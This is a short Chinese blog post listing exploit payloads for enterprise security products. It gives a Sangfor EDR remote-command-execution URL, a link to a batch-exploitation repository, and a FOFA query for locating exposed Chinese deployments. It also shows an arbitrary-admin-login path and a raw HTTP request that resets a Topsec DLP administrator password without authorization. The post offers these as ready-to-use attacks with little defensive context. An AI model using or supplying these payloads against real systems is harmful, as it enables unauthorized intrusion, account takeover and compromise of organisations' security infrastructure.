Aatrox's Blog

寻找巅峰追寻巅峰成为巅峰超越巅峰

Aatrox's Blog

sangfor edr and else payload

Aatrox 漏洞复现及利用 2020-08-18 146 次浏览

深信服EDR

RCE：

https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=whoami

批量github:https://github.com/A2gel/sangfor-edr-exploit

fofa:title="终端检测响应平台" && country="CN"

任意用户登录：

/ui/login.php?user=admin

天融信DLP

最新版本V3.1130.308ps3_DLP.1 未授权访问导致越权修改管理员密码

POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1
Host:xxxx
剩下的一些参数省略.... ...
uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1

uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1

赞 (1)

本文由 Aatrox 创作，采用知识共享署名 3.0，可自由转载、引用，但需署名作者且注明文章出处。

上一篇: python快速提取ip地址脚本
下一篇: 漏洞文档说明

还不快抢沙发

添加新评论